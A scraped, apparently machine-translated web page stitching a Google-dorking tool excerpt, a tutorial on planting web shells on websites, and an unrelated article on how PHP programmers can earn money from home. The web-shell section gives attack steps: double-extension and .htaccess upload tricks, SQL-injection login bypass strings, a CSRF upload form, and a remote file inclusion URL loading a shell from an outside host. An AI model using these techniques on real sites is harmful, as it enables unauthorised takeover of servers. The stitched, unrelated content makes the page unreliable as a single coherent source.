src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/78e/1db/b4f/78e1dbb4fc78cd422cec311fc2ca9d33.jpg' width="100%" loading=lazy loading=lazy><br>Figure 14 – Checking the site index size</p><p>Now about the unpleasant... From time to time Google may request a captcha - there is nothing you can do about it - you will have to enter it. For example, when searching through the “Error Messages” category (90 dorks), the captcha appeared only once.</p><p>It’s worth adding that phantomjs also supports working through a proxy, both via http and socks interface. To enable proxy mode, you need to uncomment the corresponding line in dorks.bat or dorks.sh.</p><p>The tool is available as source code</p> <br>In this article I want to talk about the most commonly used methods of uploading a shell to a website. <b>Web-shell</b> is a kind of malicious script (program) that attackers use to control websites or servers. <p><b>Method 1</b><br>Find a form on the website for uploading files/pictures. Let's say we were unable to hack the site's admin panel and we are trying to flood our shell with <b>extension.php.jpg .</b> If successful, we will see a white window instead of the picture, we right-click and follow the link. In case of failure, we can use the chrome extension <b>tamper data</b>. It allows you to intercept and change the request as you want. If the site checks the file extension, then first we can upload <b>.htaccess</b> file with contents: <br>AddType application/x-httpd-php .jpg <br>This command will execute jpg files as php. <br><b>Detailed video instructions:</b><br></p><p><span class="imp1oe54JeQ"></span></p><p>Video instructions for <b>tamper data installation:</b><br></p><p><span class="JA5K4KJ0NCc"></span></p><br><b>Method 2</b><br>Use the program to search for admin panels on the site - https://github.com/bdblackhat/admin-panel-finder. When the program has found the admin panel, we can try sql-injection. In the login and password field of the site we enter the code: <br><p>" or "1"="1 " OR 1=1/*</p><p>If it works, then we get to the admin panel and <b>We proceed according to method 1.</b> If there is no sql-injection in the admin panel on the site, then we can try to debug it or find an exploit for this CMS. <br><b>Detailed video instructions:</b><br></p><p><span class="5Kh5gCr_3rc"></span></p><br><b>Method 3</b><br>In method 3 we will look for sql-injection on the site itself. We can do this manually or use sqlmap. There are enough topics on the forum about how to carry out injections, so I’ll come from afar. So, now we have already found a table with the administrator’s login and password, decrypt the hashes, go to the admin panel and rejoice. But let’s say we couldn’t decrypt the password and everything went wrong, then we need to check the privileges of our user <b>. </b> We check the privileges and load the mini-shell. <b>For some reason, when I want to paste the code, the site gives me an error.</b><p><b>Method 4</b><br>Method 4 involves a csrf attack. In the below code we need to replace <b>http://</b> to our target link. <b>Select shell</b> and press the button <b>upload.</b><br></p><p> <form method="POST" action="http://" enctype="multipart/form-data" > <input type="file" name="Filedata"></center><br> <input type="submit" name="Submit" value="Upload"> </form></p><p><span class="FXOjzV5I1Cc"></span></p><br><b>Method 5</b><br>Find out more about your target and find an exploit. There is a very interesting website for this - https://www.exploit-db.com. Nobody has canceled the massive hacking of websites through vulnerabilities, but there is already an article about this on the form. <p>There are many more ways to fill a shell and there is no point in talking about each one. If you want to practice, then install dvwa - it is a program designed to help security professionals test their skills and tools in a legal environment.</p><p><b>Method 6 <br><b>Php injection</b>- this is a form of attack on a website when the attacker injects his PHP code into the attacked PHP application.</b><br>www.site.ru?page=home.html <br>By executing the command we will load the home,html page. Now we will try to load a malicious shell. <br>www.site.ru?page=http:/hacker.ru/webshell.php <br>Dork: <b>Inurl:page=</b></p><p>There is also a way to find an already loaded shell using perl</p> <p> » </p><h1>How can a PHP programmer make good money at home?</h1><p>Most successful PHP programmers make good money from home. At the beginning of any income, difficulties arise. It happens that difficulties and lack of knowledge of earning methods discourage all desire to earn money at home, and then programmers look for the opportunity to work in offices, where there is a greater guarantee that money can be received every month, and professional growth is possible.</p><p>But being able to work from home has more pros than cons.</p><h3>pros</h3><p>You will work for yourself. No one will fire you, you will be able to distribute your own schedule or work at the time you want.</p><p>You choose for yourself a way to earn money using programming, which, firstly, will increase your interest in the work, and secondly, you have great freedom of action. You don't have to work on something you don't like. There are also more opportunities to combine ways of earning money.</p><h3>Minuses</h3><p>It will be difficult at first, and in order to get the first money for your work you need to invest a lot of effort and time. And in order for there to be profit, you must constantly develop and have patience and correctly distribute your schedule so that you have enough time to complete the work on time.</p><h3>Earning money from your scripts</h3><p>There are many different scripts on the Internet that people can easily download and install on their website. You can write your own unique script, and there are two options for how you can make money from your script. Sell ​​it or post it through file sharing services. You can also use two options. For example, light scripts, but at the same time it is also very important to place through file sharing services exactly those scripts that will be in great demand. To do this, the scripts must be in demand so that people download them for their needs.</p><p>Large scripts can be sold for reasonable prices. You can post an ad on forums, or if you have your own personal blog or website, place an advertisement for the sale of scripts.</p><p>In any case, no matter what option you choose, place the script in the archive and be sure to include detailed instructions and contact information about yourself. Be sure to provide support, because it is important for you to work for yourself. After all, you need to be recommended or have your scripts downloaded. They must be of high quality. If a person asks you for help, politely explain to him about the script or help him install it. Your scripts should have comments. What each function is responsible for, etc. After all, a person can easily get confused in your code, where there are no notations.</p><h3>Own and joint projects</h3><p>It’s good to create your own website to make money successfully. There are many opportunities to make money with your website. If you promote it well, you can post scripts there for sale. Collaborative projects will expand your capabilities, which is good for home programming success. Therefore, look for partners or do not refuse offers to create a project together.</p><p>You should be sure to add features that grab attention on your website. The site may have a regular, simple look, but at the same time with its own twist. A personal website helps increase clients. They will see how your scripts work, if they don’t take too long to load, are interesting to use, and most importantly, original, unlike anything else. Then you will find success.</p><h3>Earnings on orders</h3><p>To do this, just register in various exchanges for freelancers and look for orders. Exhibit your portfolio of completed work. But be careful, there are dishonest people in the world and so that you don’t fall for deception, first show the work that is located on your server (by the way, in this case you will need to rent a vps http://nkvd.pro/vps/), and then if they pay you part, then transfer half to their server, and do the same with the second part. This method of earning money is considered profitable, but depends on the degree of your knowledge and skills. It also depends on the feedback from your customers. To succeed in this method of earning money, do the work honestly and efficiently. You must be able to communicate with customers, clearly explain what you can and cannot do.</p><p>This is not the entire list of earnings for a php programmer, but thanks to these methods of earning money, which are written above, you can already earn money without leaving home. At the initial stage, this will be a great achievement. The main thing is not to stop there. Constantly improve and create projects that will bring you not only good income, but also pleasure.</p> <br><b>about the author</b> <br><p>How can a PHP programmer make good money at home?</p> <script type="text/javascript"> <!-- var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})() //--> </script><br> <br> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </article> <div class="related_block"> <div class="title">Related publications</div> <ul class="recent_ul"> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/d356145b8d32a4e43aa5ed76e39606a7.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/en/vstupit-v-gruppu-po-zarabotku-deneg-kak-zarabotat.html">How to make money on VKontakte on your page and without it - really working methods</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/c140bebb4b361b4583c11c49e770bc39.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/en/kak-pomenyat-temu-dlya-vkontakte-v-yandeks-brauzere-kak-pomenyat-temu-v-kontakte.html">How to change the theme for VKontakte in Yandex</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/40e1db5c5747911f9c43c259f44aeadb.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/en/nastroika-velokompyutera-na-diametr-koles-26-2-2-podklyuchenie-velokompyutera-kak.html">Setting the bike computer for wheel diameter 26 2</a></li> </ul> </div> </div> <aside id="sidebar"> <div class="block"> <nav class="sidebar_menu"> <div class="menu-sidebar_menu-container"> <ul id="menu-sidebar_menu" class="menu"> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/programs/">Programs</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/windows/">Windows</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/devices/">Devices</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/browsers/">Browsers</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/reviews/">Reviews</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/reviews/">Reviews</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/setup/">Settings</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/torrent/">Torrent</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/editors/">Editors</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/instagram/">Instagram</a></li> </ul> </div> </nav> </div> <div class="block recent_block"> <div class="title">The last notes</div> <ul class="popular"> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/5e60cc62a5f20ab07a340013922f0d2c.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="The smallest computer in the world: photo, description, rating The smallest PC in the world" / loading=lazy loading=lazy> <span class="cat">Programs</span></div> <a href="https://storerarity.ru/en/samyi-malenkii-kompyuter-v-mire-foto-opisanie-reiting.html">The smallest computer in the world: photo, description, rating The smallest PC in the world</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/cdb555606d94b8ae1d51c87fc743c991.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="How to install the Yula application and register" / loading=lazy loading=lazy> <span class="cat">Programs</span></div> <a href="https://storerarity.ru/en/kak-postavit-prilozhenie-yula-zaregistrirovatsya-prilozhenie-yula-ustanovka.html">How to install the Yula application and register</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/af70d4bfa7ecf603e659893b5979f8d6.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="Smartphone Samsung Grand Duos: characteristics, reviews Samsung galaxy grand duos description" / loading=lazy loading=lazy> <span class="cat">Programs</span></div> <a href="https://storerarity.ru/en/samsung-galaxy-grand-duos-bolshoi-i-moshchnyi-smartfon-samsung-grand-duos-harakteristiki-otzyvy-sam.html">Smartphone Samsung Grand Duos: characteristics, reviews Samsung galaxy grand duos description</a></li> </ul> </div> </aside> </div> </div> <div class="clear"></div> <footer id="footer"><div class="wrapper"> <div class="copy">2024 | Computers for everyone - Setup, installation, recovery</div> <nav class="header_menu"> <div class="menu-footer_menu-container"> </div> </nav> </div></footer> <div id="toTop"></div> <script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js'></script> <nav class="mobile_menu"> <div class="close_menu"></div> <div class="mob_menu"> <div class="menu-mobile_menu-container"> <ul id="menu-mobile_menu" class="menu"> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/programs/">Programs</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/windows/">Windows</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/devices/">Devices</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/browsers/">Browsers</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/reviews/">Reviews</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/reviews/">Reviews</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/setup/">Settings</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/en/category/torrent/">Torrent</a></li> </ul> </div> </div> </nav> <script type="text/javascript"> <!-- var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})() //--> </script><br> <br> </body> </html>